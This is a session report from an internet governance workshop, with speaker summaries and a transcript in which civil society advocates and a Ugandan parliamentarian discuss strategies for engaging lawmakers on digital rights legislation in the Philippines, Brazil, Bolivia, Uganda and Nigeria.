The analysis reinforces the importance of serving the public interest in governance. It underlines the necessity of public accountability as a crucial aspect of policy-making. Policymakers are expected to prioritize the public’s well-being and uphold the principles of transparency and accountability.

However, the analysis also raises concerns about imperfect accountability mechanisms. Nick expresses apprehension that policymakers may be influenced by narrow interests, including personal interests, which can hinder their ability to effectively serve the public interest. This draws attention to the need for robust accountability mechanisms to ensure policymakers remain focused on the public’s welfare.

In conclusion, this analysis provides valuable insights into various aspects of policy intervention and engagement. It underscores the importance of comprehensive involvement, the role of civil society, the proactive approach of organizations like Internet Lab, the significance of alliances in parliament, and the necessity of serving the public interest. It acknowledges concerns regarding imperfect accountability but emphasizes the need for effective mechanisms to ensure policymakers act in the best interest of the public. These findings offer valuable perspectives for policymakers and stakeholders striving for inclusive and effective policy-making.

Audience

The analysis explores various topics concerning governance and SDG 16: Peace, Justice, and Strong Institutions. One key point raised is the difficulty in translating discussions between the national and local levels. This poses a challenge as issues can be lost or significantly altered during the translation process. It emphasizes the importance of improved coordination between local and national governance to facilitate effective communication and policy implementation. The analysis advocates for advocacy efforts to enhance coordination between these governance levels.

Another important topic discussed is Paradigm Initiative’s unsuccessful attempt to enact digital rights enabling legislation in Nigeria. Despite receiving support from certain parliamentarians, the bill did not receive the necessary assent from the President. This setback underscores the need for effective lobbying strategies and consensus-building among political parties. The analysis highlights that political parties may have differing views on digital rights, making it difficult to gain consensus and legislative support. Engaging with Members of Parliament on this issue can also be challenging due to party influences. Developing strategies that navigate these complexities is crucial to promote the enactment of digital rights enabling legislation.

Additionally, the analysis mentions the efforts in Uganda to establish a parliamentary forum on internet governance. This initiative aims to raise awareness and educate Members of Parliament on internet governance issues. The Uganda Media Sector Working Group is actively involved in creating awareness of relevant laws. Plans are underway to establish the parliamentary forum as a platform for important discussions and knowledge sharing among parliamentarians. This proactive approach demonstrates a commitment to addressing internet governance issues and promoting a deeper understanding among policymakers.

Overall, the analysis sheds light on the challenges and opportunities in governance, particularly within the context of SDG 16. It emphasizes the need for improved coordination between local and national governance, effective lobbying strategies for digital rights legislation, and initiatives that educate and raise awareness among policymakers. These insights contribute to the broader discussion on achieving peace, justice, and strong institutions as outlined in SDG 16.

Sarah Opendi

Upon analysis of the provided data, several main points emerge regarding the role and responsibilities of parliamentarians in relation to the digital space, technology, and internet governance.

Firstly, it is argued that civil society should equip members of parliament with necessary information and skills in the digital space and technology. This would enable parliamentarians to better represent the public’s interests in this increasingly important area. Furthermore, the central role of parliamentarians in connecting the public and the executive, thereby representing the public’s interests, is highlighted as essential.

Another key point is the need to create awareness among parliament members about technical matters related to the internet and internet governance. The evidence suggests that currently, only a few parliament members possess an appropriate understanding of these issues. It is proposed that by increasing awareness and knowledge in this area, parliamentarians can effectively address digital literacy issues, advocate for affordable internet access, and ensure the incorporation of ICT in the education curriculum.

Additionally, the analysis reveals that in Uganda, parliamentarians should serve as links to lower local governments on internet governance matters. It is noted that there is currently a missing ICT committee at the local government level to oversee internet issues. The implementation of a top-down approach, engaging policymakers, is advocated by Sarah Opendi, reflecting her belief in the importance of connecting parliamentarians with grassroots communities.

Furthermore, it is brought to attention that artificial intelligence (AI) remains largely misunderstood by parliament members. Increased awareness and equipping parliamentarians with key information on AI is advocated as a means to address this knowledge gap.

In terms of advocacy and collaboration, Sarah Opendi supports the idea of a parliamentary forum on internet governance, which would serve to handle advocacy issues and foster collaboration with civil society organisations. This forum aims to strengthen the involvement of parliamentarians in internet governance matters and enhance partnerships for the goals of peace, justice, and strong institutions.

Noteworthy observations include the suggestion that identifying champions for bills is crucial to ensure their successful passage into law. In Uganda, laws can be passed even if the president does not assent to them, provided that parliament insists on returning the bill to the president. It is also highlighted that engaging local populations through effective means such as radio talks and community meetings organised through local governments is key to advocating for bills.

In conclusion, the analysis sheds light on the importance of civil society’s role in equipping parliamentarians with digital knowledge, as well as parliamentarians’ central role in representing the public’s interests and connecting with the executive. It underscores the need for increased awareness and technical knowledge on internet governance among parliament members. Furthermore, it highlights the necessity of advocating for affordable internet access, addressing digital literacy, and incorporating ICT in the education curriculum. The creation of a parliamentary network on internet governance, the identification of champions for bills, and engagement with local populations are proposed as effective strategies to enhance the role of parliamentarians in policy-making and governance processes.

Liza Garcia

Liza Garcia is a prominent human rights advocate who leads an organization dedicated to monitoring and documenting cases of rights violations, with a particular focus on online gender-based violence. Since 2012, Garcia and her team have been diligently collecting evidence of instances of this form of violence. They also actively monitor developments in areas such as SIM card registration and the national ID system.

Garcia strongly believes in actively participating in the process of drafting and implementing laws. She emphasizes the need to ensure the proper implementation of laws and regulations by advocating for her organization’s voice to be heard in policy consultations. By engaging policymakers and parliamentarians, Garcia provides them with evidence of rights violations to support her cause.

An important aspect of Garcia’s work is educating citizens about their rights and the potential impact of new laws. To achieve this, she conducts workshops in communities to increase awareness and empower individuals to protect their rights. By fostering a deeper understanding of the law and its implications, Garcia aims to empower individuals to take action and advocate for their rights.

In the realm of policymaking, Garcia focuses specifically on gender and ICT, as well as privacy and data protection. She aims to address gender disparities in the digital space and advocate for the privacy and data protection rights of individuals. By collaborating with partner organizations and consulting with relevant stakeholders, Garcia works towards building an agenda that reflects the needs and concerns of these communities.

One notable aspect of Garcia’s work is her opposition to the SIM Card Registration Act. She actively campaigned against this legislation, creating a briefing paper that was distributed to legislators and other concerned groups. Thanks to her efforts, the law was successfully vetoed during the previous administration. However, Garcia expresses disappointment that the law eventually passed under a subsequent administration, highlighting the challenges faced in maintaining progress.

Garcia also recognizes the importance of community engagement and collaboration with local governments. She emphasizes that local governments have the ability to pass policies that might be challenging to implement at the national level. By fostering these partnerships, she believes that effective change can be achieved more readily.

Effectively disseminating information is another key area of focus for Garcia. She acknowledges the pivotal role that social media plays in providing information about digital rights issues. Garcia emphasizes the need for individuals to be engaged on whichever platforms they use to stay informed and take action. Additionally, she notes that visual and easily understandable content can be more effective in conveying information, especially as people may be less inclined to read lengthy research papers. By utilizing visual communication, Garcia aims to engage a wider audience and prompt action.

Lastly, Garcia acknowledges the importance of media engagement in raising awareness and expanding the reach of the issues she advocates for. By engaging with the media, she can increase public visibility and generate support for her cause.

In conclusion, Liza Garcia is a dedicated advocate for human rights and an influential figure in the fight against rights violations, particularly online gender-based violence. Through her organization’s efforts to monitor and document cases, Garcia collects evidence to support her cause. She actively engages in the policy-making process, educates citizens about their rights, and focuses on gender and ICT, privacy, and data protection in policymaking. Despite facing challenges in maintaining progress and opposing unfavorable legislation, Garcia remains committed to community engagement, effective information dissemination, and media engagement to further her cause.

Session transcript

Liza Garcia:
chance to intervene and that is with the drafting of the implementing rules and regulations once it’s already a law and implemented then there is the monitoring of the law for its proper implementation of course there are also aside from the laws being passed there are also policies emanating from other government agencies for example in the case of the Philippines with the they were coming up with the national cybersecurity plan so government would always have this consultation with different stakeholders and since since it’s also part of the the issue is also something that we look into then we make sure that we are invited and that our voice is heard when it comes to certain especially in looking at certain provisions in in this plans yeah what else we we as a civil society organization we’ve been monitoring actually and documenting cases of the rights especially the violations for instance since 2012 we’ve been documenting cases of online gender-based violence in the country currently we are also monitoring development in the SIM card registration, which you mentioned, which was just passed. There’s also the national ID system. We’re looking at how our rights are affected by the passage of these laws. And since we’ve been monitoring them, we have cases, then we have evidence also when we go to, when we have dialogues, engagements with parliamentarians or, you know, policymakers, then we have some evidence in our hands that, hey, you know, this is happening, can we do something about this? So those are some of the things that we do. But at the same time, it’s not just with legislators, with policymakers that we engage with. We also make sure that citizens also know their rights, that they are aware of the even digital laws that are being passed and how it would impact them. So we also, from time to time, we go to communities and have dialogues with them, conduct workshops. So they know what the laws are and how this may, or how these are affecting them as well.

Nick Benequista:
That’s terrific. I mean, it sounds like you’re really taking advantage of every entry point that exists within the rules and regulations for participation in the policy process, as well as, you know, gathering the evidence and holding the discussions to keep an eye on how those policies are being implemented, the consequences of those policies. That sounds like a really holistic approach. You hadn’t mentioned the agenda setting aspects of policymaking, and just one quick follow-up. In terms of who is deciding what pieces of legislation, what issues get legislated and regulated, do you get any experience on getting civil society to build the agenda, the legislative agenda itself?

Liza Garcia:
In our case, our focus is really more on gender and ICT and then privacy and data protection. So we mostly intervene in cases like that. But of course, when it comes to, yeah, so we intervene in cases of that. And we have also, we also consult with our other partners. They may not be focused on digital rights per se, but, you know, they are working on specific issues that may be impacted by this law. So we work with them as well. We consult with them and we come up with an agenda. For instance, when we were looking at the SIM card registration act, it’s been there since, I don’t know, 2014, I think. And then by, and we were looking at it already by 2018, I think we came up with a. briefing paper, my colleagues from the privacy program earlier, so we came up with a briefing paper already and it was published, it was distributed to even legislators, to some other groups and yeah, and yet every Congress, there’s always someone who proposes that bill, it’s always there. And I remember in the previous administration, it was about to be passed, both houses of Congress already approved the bill. So it was just for the signature of the president. But what we did in civil society is we had a discussion among ourselves, are we okay with this bill? So what do we do? So we came up with a statement. So I think there were three of us, they came up with, they were doing an online campaign, one group was doing an online campaign. We came up with a statement and we asked other organizations, partner organizations, if they agree with the bill. And if not, there’s this statement, maybe you can sign on it. And at the last minute, we even submitted a letter to the president to veto the SIM card registration act. Fortunately, during that time, it was vetoed by the president. We were also surprised by that small win. However, of course, things change during the next administration, it was the first piece of legislation that was passed into law by this current administration.

Nick Benequista:
Thanks very much, Lisa. That’s great, though, you know, I’m sure you don’t win every battle, but you gain strength every time you engage in some parliamentary debate, I’m sure the networks grow stronger and stronger. So like, that sounds like a terrific approach that you guys are taking. Fernanda, from Internet Lab. So Brazil is known for its experiments and participatory governance, participatory budgeting, in the context of internet governance, platform regulation. Curious to know if you’re seeing the same level of innovation in terms of participatory, multi stakeholder policymaking. So how are parliamentarians in your country engaging in these issues? And are diverse perspectives in particular, finding their way into the debates?

Fernanda Kalianny Martins Sousa:
Good morning, everyone. Thank you, Nick, for the invitation and for the question. It’s really Pleasure to be here discussing this theme with you. Related to Brazil, to be honest, although Brazil to be known for social participation in discussions and related to internet governance, when we started this new Lula government, I think it is a little frustrated for civil society organization. Because in comparison with Marcos Civil da Internets in 2014, when we had really participation of academia, civil society organizations, and legislative and executive members, now the context is so different. Because we had a far-right government in the last four years. And when Lula assumed the new presidential, we had the pressure of society. We have the pressure of federal state. We have the pressure of chamber of deputies. And with this context, with the sense of an emergence, it’s not the same process. So we have the bill 2630 discussed in the last three years. And now with the new federal government, we are trying to approve this law. This law is fruit of the civil society organization’s work in the last three years combating the Bolsonaro government. So it is a good law with some problems. But we don’t have the sure that this law will be approved. So it is. interesting to think how, in Brazil, the discussion related to platform regulation can also side. So, the importance of this discussion now becomes a kind of bargaining ship with the Congress. So, when far-right congressmen decide to vote, I think related to abortion, for example, or a bill that will attack indigenous people, the president of the deputy chamber said, no, if you put this in votation, we will vote 26th. So, it is a movement so complex because we had, in the beginning of the year, the attempt to occupation of Brazil, and after that, some attacks against public schools in Brazil, and all this discussion is related to also side not more the experts of digital rights, as in the case of Marcos Civil da Internet. So, in this context, I think it’s important to say that we don’t have a government consulting civil society as occurred in the past, and I think it is an important thing to pressure the government. And when we leave this process to left government, we have people from civil society organization with the government, to the government, and it’s complex because we know these people, we know that they have good intentions, and at the same time, we know the complexity of the political conjecture. So, it is a really difficult moment, but a moment if we can hope. So, it is hard, but not too hard as in the last four years. Great, thanks. Thanks a lot for three years.

Nick Benequista:
That’s that’s yeah, that’s a lot of work, it sounds like. I mean, can you just there’s one quick follow on question. The three years that you put into bringing civil society together. Can you just say a few words about the scope and scale of that effort? Does it do you have to travel around the country? Is it a matter of, you know, meetings in the capital or a few other cities? How do you how do you do the work of getting these diverse views together on this issue on the twenty six thirty bill?

Fernanda Kalianny Martins Sousa:
Sure. So at Internet Lab, we are working with some things related to Internet governance since the last nine years. So when this discussion started, we are working together with the Kuala Lumpur region. It is the coalition that have more than 50 organizations in Brazil, in all country. And there we have this movement to try, understand and follow all movements in different aspects of the Congress. And the discussion is step by step of these laws of these bills discuss it. And in the case of platforms of regulation, I think it’s important to highlight the role of the federal deputy, Orlando Silva. He’s a congressman in a left party. And in these in in his role in this discussion, it was so important to have a parliamentar that involved it. with the discussion. And it’s not common, you know. We have now the discussion related to intelligence, artificial intelligence regulation in Brazil. And we realized that it’s not easy to parliamentaries understand what is happening, what is the impact of this kinds of regulation. And because of that, I think on main problem in this discussion, it is, okay, the government is part of the emergence, but we can’t think just in the emergence. We need to think in the future and the flexibility of this law, this kind of law need to have. So I think that the point is, 10 years after Marcos Civil Approval, we know that self-regulation has not working. And I don’t know, in five years, we might be saying that state’s regulation was not sufficient. So the challenge for me is how we can learn with what’s happened in the last 10 years and not repeat the wrongs that we committed in this process. That’s terrific, Fernanda. And I mean, it highlights an important point of,

Nick Benequista:
you know, I think engagement for most civil society organizations with parliaments and policy processes tends to start out being quite reactionary. And it sounds like over, you know, the last decade, you are beginning to develop the networks and the capacities to think proactively about that agenda, which is, yeah, fortunate. I mean, I think that’s probably a privileged position relative to others. You also mentioned an important point, which is a great segue to this introduction. You mentioned the importance of having an ally in parliament. uh, you know, at the beginning of the discussions around, uh, the misinformation law. Um, and we are in fact joined, uh, fortunately by the Honorable Sarah Opendy, uh, to my left here, who is an executive committee member of the African Parliamentary Network on Internet Governance, APNIC. So, um, she is, uh, the, you know, executive committee member on a network that is precisely trying to build a network of parliamentarians who can champion these discussions and the development of policy, uh, across the African continent. Uh, she is a Ugandan state minister for mineral development, uh, a chairperson, uh, at the Uganda Women Parliamentary Association. And prior to all this, uh, the Honorable Opendy was the state minister for health, uh, for which she received a global, uh, leadership award. So, um, I’m so glad you could join us, um, because it is, uh, allies, uh, in parliaments willing to work with civil society, uh, are, uh, too rare indeed. Um, so a question for you, uh, Honorable, uh, Opendy. Um, you know, we have seen national policy makers exerting growing influence over the internet and digital governance. Um, you know, policy makers, of course, uh, do represent the public and are held accountable through electoral, uh, means, but, uh, those forms of accountability are still imperfect, uh, in many, in, uh, all countries around the world. And it’s especially imperfect on an issue such as this, which doesn’t have a ton of, of public engagement. And so there, there is a risk, I think, you know, that policy makers, uh, may not be serving the public interest in terms of their engagement on these issues. They might be serving other, other interests, narrow interests, including personal interests. And, um, so what, what’s your advice and thoughts on how to ensure that policy makers in this area are serving the public interest through their work?

Sarah Opendi:
Yeah, thank you very much. And thank you for that introduction. I bring you all greetings from Uganda, the Palo of Africa. And, uh, you for inviting me to this panel. I came in when my colleague was speaking about the civil society and how it’s important for them to engage with members of parliament. We must agree that as parliament we play a central role between the public, we are between the public and the executive. And our role as members of parliament is certainly to make laws, legislative function, but also the function of representation. And in as much as possible we must be able to speak and represent the views of the public. But the subject that we are discussing, this digital space, technology, is something that we all know that it’s important. However, not much emphasis has been made in even creating awareness among members of parliament on technical matters. So it’s very important since we have the civil society, the NGOs, to first and foremost as much as possible give the members of parliament, arm them with the relevant information, the relevant skills, so that they can be able then to represent the public interests better. You have said we are serving personal interests or narrow interests. Yes, true, because even amongst us as members of parliament there is a bit of lack of information. Other than us talking about misinformation and disinformation, when it comes to the technical details about internet and internet governance as a whole, we have very few. people who can speak up on that matter. So this is why we came up with the African Parliamentary Network on Internet Governance, so that we can bring together like-minded people to champion the issues of internet governance at the country level. Actually, as we speak now, in my country, although we have the ICT, the Internet Communications Technology Committee within parliament, their role is mainly to oversee, you know, oversight over the government programs and government policies, but that’s not all. We need to engage in advocacy. We need to see the challenges that the population is facing. We need to ensure that internet is affordable. We need to ensure that even as we speak now in my country, only about 29% of the people have access to internet. So we need to ensure that when we are even appropriating funds, we appropriate adequate funds so that the entire country can be covered. We have areas where we don’t have electricity as we speak now, even if, and we have areas where the telecom companies have not been able to invest in. So not the entire country is covered. There are areas you go to and you’re off internet. So these are some of the things that legislators must do. Appropriate funds, first of all, recognize the importance of this digital economy and know that it has a multiple economic benefit to the entire population if they are all connected. So we also must ensure that as part of the education curriculum, this whole technology, ICT, is taught to the children because that is also another challenge. We have a population that are a bit illiterate. We have people. with smartphones and they can’t use them. So there is a lot of work that still needs to be done in terms of digital literacy. And of course, engagement of the civil society, engagement of the government are all important. Other than just legislation, there’s a lot that we have to do as members of parliament. Thank you very much.

Nick Benequista:
Thank you. Thank you very much. I’m so glad you’ve been able to join us. And I have some follow-on questions. I’m going to come back to you for sure. I just want to turn to Camilo for a moment. Camilo joins us from Bolivia, from Internet Bolivia. As I said, he’s an Open Internet for Democracy fellow. And I think Camilo has a really interesting perspective to add. We’ve been talking primarily about legislation and policy at the national level, but Camilo has taken a different approach. He’s been working at the municipal level. And you don’t often think of internet governance and digital governance at the municipal level, but you have a strong view on this. So can you explain why the municipality is a good place to engage in Bolivia? And I think it’s on data privacy in particular, the issue that you’re working on. So if you could say a few words about your approach. Thanks.

Internet Bolivia Foundation:
Hi, thank you. Thank you, Nick. Thank you everyone for coming. Yes, actually, I’ve been working with Internet Bolivia Foundation. And I think that Bolivia Internet Foundation is working really well in municipality level and local levels. Because as you know, there’s no actually a regulation for protection and processing of personal data in Bolivia. But it doesn’t mean that we have to be unprotected. We shouldn’t be policies about that in local levels, right? We have like a really good news. I think we have, for instance, in Coroico, like it’s a small municipality in Bolivia. Recently, they have a policy about digitalization and data management, for example. And that makes me think that how you can really work in local levels, right? And then I decide to focus why and I think I have some reasonable reasons. I think that working in the municipality level, in local levels, have a very direct and deeply understanding what are the local needs, for example, in the communities. Because they are really close to the people, they can work with them. And in these terms, after the pandemics and after everything we throw the last years, I think that the digital access, the data protection, the internet usage, the data violence, the gender approach, having a very important things, right? And in the local levels, you can also work with them. Another thing is like maybe in some local regulations, they can be more faster and more effective. Because sometimes in the local, from a national perspective, for example, there is a lot more bureaucracy, you have to like many steps to do it. But sometimes in local levels, you can do like more effective and faster approach. And they are less bureaucratics. And in that sense, like the local policy can be even better than the national level, right? And sometimes I think that would be really easy for a local level to ensure really nice. policies in that sense. Also, I think that I have another reason that is about innovation and digital. In this topic, at least, I think that it provides to be like a pilot, I don’t know. Because, for example, as I mentioned in Coroico, they recently have this digitalization and data management regulation. And after it happened, many other municipalities wants the same. They contact Internet Bolivia, and they want to know what is this about, what they have it. So is it possible to have it at a local level? We don’t have to wait for the national level. So I think that’s a really nice entry point, because now they are interested, and they realize they can actually do some policy in digital rights from local perspective. And it’s possible, right? And also, I think I was thinking about how these local digital rights regulations can empower, actually, some local leaders also. Because sometimes, the local leaders are young, usually. Because the national policymakers usually are not that young as the local policymakers. So these local policymakers, if they are young and they are engaged in these digital topics, actually, they are very empowering about these topics. So I think that’s very interesting. And taking, again, the example of Coroico, I think that she’s like the major is like a woman. I see 30 years old, so she’s really young, and she’s really into these digital topics. And I think it was a really nice way to empowering her to know about this topic and to talk about that and to be like a really nice policy now. And also, I think that it’s really, I think the most important thing can be like the community involvement. Because I used to criticize a lot some local governments, because sometimes the local representatives in the national policymaking assemblies, for instance, they usually don’t live in the communities anymore. They just decide to move to the big cities and make local policies for them, but from big cities. And they don’t live in their local cities anymore. For example, if I am a policymaker in La Paz, for example, from a small town, but they decide to move to the big city in La Paz, but they are not more engaged in their local municipalities. And I think that doesn’t work. That’s why they don’t really do good policies in that term. But when you work in a municipality living from local perspective, that people is living there, they are with them every day, they can realize what they can do. And in that terms, I think that’s very interesting to work from a municipality entry level point. That’s great, Camilo. And I’m gonna go back to the Honorable Ms. Appendi in a moment to react to some of what you’ve said, but a quick follow-on question for you. It seems to me that you’ve probably learned a lot about what makes people care about digital policy issues. With so many pressing issues in a local community, what convinces people that data privacy of all things is something important? Yeah, I think it’s a nice because when we were working with Internet Bolivia in these local communities, we usually like to do some workshops and everything. And I think that is very important because if the people from the communities know about what we are gonna do, I think that is a really nice entry point to make them like this kind of policies about digital governance. Because sometimes people from small communities, they thought this is a really huge and big issue. But sometimes when you teach them and when they are engaged and we do workshops and we try to show them how it should improve, I think they are more engaged. And I usually like, for example, some communities we are working for, and I used to travel also around inside Bolivia since I work for Internet Bolivia. For example, in Villa Montes, there is a really nice community and you can work with them. These topics, just as soon as we arrived to Villa Montes, they know we are like Internet Bolivia Foundation and they just approached you and like, we want some workshops, we want to know something about digital rights. And they are really into this. So it’s really nice actually, because we are not imposing, they are asking to us to do it. to engage in these topics. And after just working with the communities, then the policy makers come, the government come and say, oh, what should we do? Because people is interested. And I think that is really interesting. And also, and I think it’s very important also that we have, for example, in Internet Bolivia, we have like a nice organization partner. And she works in Coroico, for example, or in Villa Montes, like all the time. And they are present there. I think that’s very important to not to be an NGO that just come there for a two or three focus group, for example. And then the policy makers know, and the people from the community know that this is just some guy or some organization that comes for like one week, two, three days just to do some observation work. Now they realize what we need. And I think that’s not a good entry point. But if you work continuously every week, or basically you live in the community, or you just work in different other topics, they usually engage with the topics we want. And that happened, I think, in Coroico, because in Coroico, I realized that people is really eager to these topics about digital violence, for example, because we’re constantly traveling there. And we also help them with another kind of topics like youth empowerment, for example. And it’s really interesting. And also now in Villa Montes and in Coroico in Bolivia, there are these small communities, but they are also working for regulation for youth, for example. But they are putting in these youth policies like the digital perspective, because they are young and we are living in a digital era. So now it’s like the digital perspective is gonna be in this regulation policy. So it doesn’t have to be also like digital regulation. It can be like the young regulation, youth empowerment regulation, but with a digital perspective.

Nick Benequista:
Great, thanks a lot, Camilo. I said one last question for you, Honorable Appendi, and then I’m gonna open up the floor for your questions. So those of us who are sitting behind, please come join the table. It’s a workshop, so we do at least where we can see you in case you have a question. And there’s plenty of chairs over here. So we’ve heard from the other panelists, different approaches to engaging with policymakers in the Philippines, taking advantage of the kind of formal structures of participation that the. Assembly there offers for participation, this municipal-level engagement that Camilo was describing, and in the case of Brazil, really building a strong network of civil society organizations in conjunction with allies in the Parliament and in the government over the course of many years to actually proactively put forward ideas for policy. I think a lot of the folks here are probably asking themselves, what is the best strategy? And I mean, I know it’s contextual, and it will vary, but what advice do you have for folks on how to think about how to start engaging with policymakers, bottom up, start here in this space and bring more parliamentarians, build the networks? I mean, there’s many options, but what do you think works? In my view, the way we are structured in my country, in Uganda, is that we have a national

Sarah Opendi:
parliament, members of parliament are elected from the grassroots, but also at local government we have elected leaders at the district level and the sub-county level, but also aware that connectivity is still low and access to internet a little limited. As I said, only 29% of the population currently have full access to internet. The best way is to engage members of parliament. It should be a top-bottom approach. And why I’m saying that is because when you move to the local government level, while at the national level we have the ICT committee that does oversight over issues of internet, when you get down to the local government level, that kind of committee is missing and therefore it is the members of Parliament who should be the link to the lower local governments and that’s why I’m opting for the top bottom approach but also as I did indicate awareness creation among members of Parliament is key but also arming the members of Parliament with the key information is also very important we are now talking here about issues of artificial intelligence about other than a few members of Parliament reading about it I’m not sure that we are even one third that know the details about the challenges and the benefits of artificial intelligence so it’s important for the civil site organizations aware that they are also grassroots best and they pick views from the grassroots it’s important that they pick this information whatever information they have and all those other technical information and bring it to the members of Parliament and then we can be able to champion this but also the other thing is to ensure that at the parliamentary level actually as we speak now I am trying to create a parliamentary network on internet governance a forum a parliamentary forum on internet governance so that we can have this away from the ICT committee we need to have members of Parliament who can be champions on issues of internet governance so this to me is the way to go because then when you have this forum which is not the official parliamentary forum then we can be able to handle issues of advocacy and deal freely with the civil society organization so that is to me the way to go thank you very much that’s great that that forum a

Nick Benequista:
little bit separated from the kind of official policy-making bodies gives more freedom to engage it’s away from the usual committees because their work is

Sarah Opendi:
structured in a certain way that’s a terrific piece of advice great I’d like

Nick Benequista:
to open up the floor you questions also experiences if you have of some lessons learned down at the end. Is there a, oh, Herman, is there a microphone in front of you there? I think the camera, they probably prefer that you grab a microphone and be at the table. Well, thank you. Thank you very much.

Audience:
This is Herman Lopez from the board of the Judges Standing Group of the Internet Society. Thank you very much for your explanations. It’s really good to see different perspectives from the global South on how to coordinate between a more local level and a more national level. But I wanted to ask the panelist speakers, maybe what like practical advice should we take when we do that coordination? I particularly work in many advocacy issues with the Colombian Congress, but it’s usually very difficult to translate those discussions that are happening in the capital city, in Bogotรก, to other places. So I would like to know in your own experience how you’re able to better do that, because sometimes what happen is that issues get lost in translation when they’re coming from the local level to the national level. Sometimes issues end up changing a lot, but also the other way around, when the government from the national level is trying to do things in the local level, it also changes. So what can we do to kind of preserve the message and preserve the idea that was originally intended? So thank you very much.

Nick Benequista:
Great, I’ll take another couple of questions. Yeah, go ahead, Tobe-Kile, and then Claire.

Audience:
Thank you so much for the reflections there. I will come in and just share an experience from our end. My name is Tobe-Kile Matimbe and I work for Paradigm Initiative. We work across Africa promoting digital rights and digital inclusion. And a few years back, what we did as Paradigm Initiative is we came up with a draft digital rights bill, which we introduced within the Nigerian parliament. And we were able to collaborate with some parliamentarians who were able to help us push forward that digital rights bill. But unfortunately, after it had sailed through, you know, with Parliament, it then was not assented to by the President. So I’m just curious in terms of how we can collaborate in terms of effective, not, I don’t want to use the word lobbying, but effective, you know, pushing for laws to be enacted and how that process works. I will also just possibly direct this question to the Honourable Minister, Honourable Member of Parliament from Uganda in terms of what the recommendation would be with regards to how we can effectively see the enactment of digital rights enabling legislation in view of that. And also in other jurisdictions that we work in, we’ve noted that as well. We have a challenge where we might engage with members of Parliament, but then what happens is that when a political party has a certain view on something, no matter how much you engage with a member of Parliament, the outcome of that possible engagement and collaboration with a member of Parliament might be futile because at the end of the day, even if you sort of like in principle agree on what needs to happen with regards to policy, the pushback comes from the political parties that members of Parliament come from. So what would be the way forward in that respect? Great, thanks. Claire, go ahead and introduce yourself first. Thank you. My name is Claire Mohindo from Uganda, and it’s good to hear from the Honourable Minister from Motherland. Supplementary to what she mentioned about parliamentary forums, and I’m really glad she’s mentioned that they are planning to set up a parliamentary forum because from experience on advocacy and different issues, parliamentary forums have been very key in educating members of Parliament on key issues, especially, but also to help build a of champions on key issues. So it’s a good thing to hear that they’re planning to come up with a parliamentary forum on internet governance. I’m curious to know how far that has gone, at what stage have you reached in terms of setting up that forum. Also to pick on lessons from my engagement with the Uganda Media Sector Working Group, which is a coalition of stakeholders from the media industry, academia, government, the media council, and the ministry of ICT. What we’ve been doing is to organize sessions where we educate people on different laws that have been passed, even those that we don’t agree with, but to create awareness, create messages, and break down things to help people understand them. So it would be nice to know how far the parliamentary forum setting up process has gone so that we can see how to collaborate and see how to work with the members of parliament. Thanks. I’m going to go

Nick Benequista:
back to the panelists now, because otherwise we’re going to run out of time. So there’s Herman’s question about the mismatch between the local and the national level. From Nigeria, what happens, how do you do effective lobbying? It’s a bit of a swing and a miss there. And what happens when it gets politicized, when you end up with real strong political opposition from one side to your proposal? And Claire, how is this parliamentary committee, sorry, this parliamentary forum, I should say, developing? So I know many missed, yeah, do you want to start with the responses

Sarah Opendi:
there? And then you guys as well. Thank you. Thank you very much. Maybe I’ll begin with the parliamentary forum. We’ve written to the speaker and we’re still waiting for a response because certainly the speaker must agree to either being a patron or not. So That’s where we are. Otherwise we have membership drawn from different political parties. So we’ll certainly let you know once we are done with that. And of course, this has all arisen because of the various engagements or meetings that I have attended. And I’m busy out here while in country within parliament. There is not much work that is being done. So it is actually something that I have championed as myself aware that it’s quite important to have that advocacy. And of course, moving to my sister, she was talking about the challenges of the politics around some of these bills that come in parliament in relation to internet or the digital bills. But I want to just tell you that once you have champions, irrespective of which political party they belong to, they will stick to what they believe is right and what should be done. And that’s why it’s important during this whole process when you have a bill before parliament, you need to identify champions. And if a bill has moved through the processes and the president has not assented, when you have people in parliament convinced that that bill is important, they will still stick to that. In my country, we’ve had bills that have gone to the president and the president has not assented to them and returned them. And the law says when the president returns and parliament returns it to the president and the president returns it again and parliament returns for the second time, it becomes law. For as long as we do not change our position. So the most important thing first is to convince members of parliament. that the provisions in that bill are correct. And once, but also the population, because it’s the population that puts pressure also on members of parliament. So when they hear all these voices from the population, urging their members of parliament to stick to certain provisions or to stick to this law and they want that law, definitely the members of parliament will act. So do not just engage the members of parliament. As civil society also engage the population so that the voices can come from down and put pressure on members of parliament. And then they’ll be able to move irrespective of the president’s position, irrespective of the political party’s position, the members will stick to that bill that they believe is the correct one and has majority support from the population. So that is just my advice. Do not lose hope. If the bill was returned, engage members of parliament, go and engage the population, put pressure on their members of parliament. I think the other was from the gentleman who was asking how we can move from the national to the local level. One of the ways is once you have members of parliament armed with the necessary information and you have the members of parliament, like the forum I’m talking about, then you can engage the population through radios. We have radio talk shows, for example, as the Uganda Women’s Parliamentary Association, we have certain bills that we are working on like the marriage bill in my country, it’s over 100 years, 1905. So what we do is to go out, you may not reach every community, but when you get to the different radio stations in different regions, you reach out to a wider audience, sensitize them so that they can understand, but also they can call in and you get the views from them. The other is to engage, for example, we have local governments in my country. my country, at the district level and at the subcounty level. You can engage those local government leaders, equip them with the relevant information, so that they can also reach down and speak to the population. So those are some of the things that can be done. Thank you very much. Thanks very much.

Nick Benequista:
So we’re running short on time. I just wanted to give you guys each a couple of minutes to respond to the three questions. Lisa, do you want to start? We’re not going to be, I think, unfortunately, time won’t allow for another question, but stick around. I’m sure there’ll be an opportunity for us to chat informally, too. Yeah, okay.

Liza Garcia:
That disconnect between the community and at the national level, as I mentioned earlier, it’s not just engagement with legislators that we do. Engagement with the community is also important, and that’s one of the things that we do. We have whole discussions with groups within the community, and also, I agree actually with the honorable opinion that engagement with the local government works, because in our case, for instance, if there are certain laws that are difficult to pass, it would take years, years, even decades for some laws to be passed. But if you engage with the local government, they can pass policies. For instance, this policy on anti-discrimination, some cities have passed this, and yeah, it did not have to pass through national legislation. There’s also the role of social media. Of course, we need to engage individuals wherever, in whichever platform they are, so it’s important to engage them in that area, provide them with information about digital rights issues. And then we also do some, we do partnerships with different groups. For instance, in the case of, we’re doing some campaign on this information for people to understand what it is all about, so we partnered actually with artists, with comic artists. They came up with a series of comics explaining what this information is all about, and then why it’s bad for you, et cetera, and not just that, we published it on social media. we also hold exhibits in different areas for people to understand what it is all about. Because sometimes, you know, people, it’s difficult if you just give them, if you have these long researches that you have, people won’t read that. So the visual thing, and if it’s short, then that’s something that they would read. And also engagement with the media. If you want to hype your issue, then go to the media. So there’s also a wider reach to the public.

Nick Benequista:
